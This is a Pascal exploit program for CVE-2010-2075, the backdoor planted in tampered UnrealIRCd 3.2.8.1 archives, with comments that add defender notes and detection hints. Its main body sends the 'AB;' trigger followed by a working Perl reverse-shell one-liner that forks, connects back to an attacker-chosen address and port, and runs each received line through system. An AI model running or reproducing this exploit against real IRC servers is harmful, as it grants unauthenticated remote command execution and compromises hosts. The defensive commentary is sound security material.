program exploit;

{
  CVE
    CVE-2010-2075

  Vulnerability
    UnrealIRCD v3.2.8.1 has an RCE - If you send AB; to any listening
    service it executes the command.

    Reviewer clarification: this is not a coding bug in the daemon. It is a
    backdoor that was inserted into the 3.2.8.1 source archive on some
    download mirrors (a supply-chain compromise, reported for archives
    fetched between November 2009 and June 2010). The affected "listening
    service" is the listener of an ircd built from the tampered archive,
    not every service on the host. Commands run with the privileges of the
    ircd process and need no authentication.

  Defender notes
    - Remediation: replace the installation with a build from an archive
      whose signature or checksum matches the project's published value
      (see the vendor advisory; no hashes are given on this page). Treat a
      host that ran the tampered build as compromised.
    - Network detection: data arriving on the IRC port that starts with the
      AB; marker before any IRC registration.
    - Host detection: the ircd process spawning perl or a shell, and an
      unexpected outbound TCP connection from the IRC server.

  Requirements
    Synapse - Install through OPM

  License
    Apache 2.0

  Author
    Marcus Fernstrom
}

uses
  tlntsend, sysutils;

var
  { Synapse telnet client, used here only as a plain TCP sender. }
  Sock: TTelnetSend;

begin
  { Exactly four arguments are required. As used below: 1 = target host,
    2 = target port, 3 and 4 = address and port inserted into the payload. }
  if paramCount <> 4 then
  begin
    { NOTE(review): both usage strings look truncated; the argument
      placeholders were probably angle-bracket tokens lost when the page was
      extracted. This branch also ends without setting a non-zero exit code. }
    WriteLn('Usage ./exploit ');
    WriteLn('Where is where you are running a netcat listener');
  end
  else
  begin
    Sock := TTelnetSend.Create;
    try
      Sock.TargetHost := ParamStr(1);
      Sock.TargetPort := ParamStr(2);
      { Synapse timeouts are in milliseconds, so this is one second. }
      Sock.Timeout := 1000;
      { Login opens the connection. Synapse returns a Boolean here and it is
        discarded, so a failed connect is not reported to the user. }
      Sock.Login;
      { One line is sent: the AB; marker followed by a perl one-liner.
        ParamStr(3) and ParamStr(4) are concatenated into it verbatim as the
        PeerAddr value. On a backdoored server the perl code forks, connects
        back to that address and passes each line it reads to system, which
        is why the defender notes above watch for perl child processes and
        outbound connections. A patched or clean ircd treats the line as
        ordinary, invalid IRC input. }
      Sock.Send('AB; perl -MIO -e ''$p=fork;exit,if($p);foreach my $key(keys %ENV){if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new IO::Socket::INET(PeerAddr,"' + ParamStr(3) + ':' + ParamStr(4) + '");STDIN->fdopen($c,r);$~->fdopen($c,w);while(<>){if($_=~ /(.*)/){system $1;}};''');
      Sock.Logout;
    finally
      { Always release the socket object, even if a call above raises. }
      Sock.Free;
    end;
  end;
end.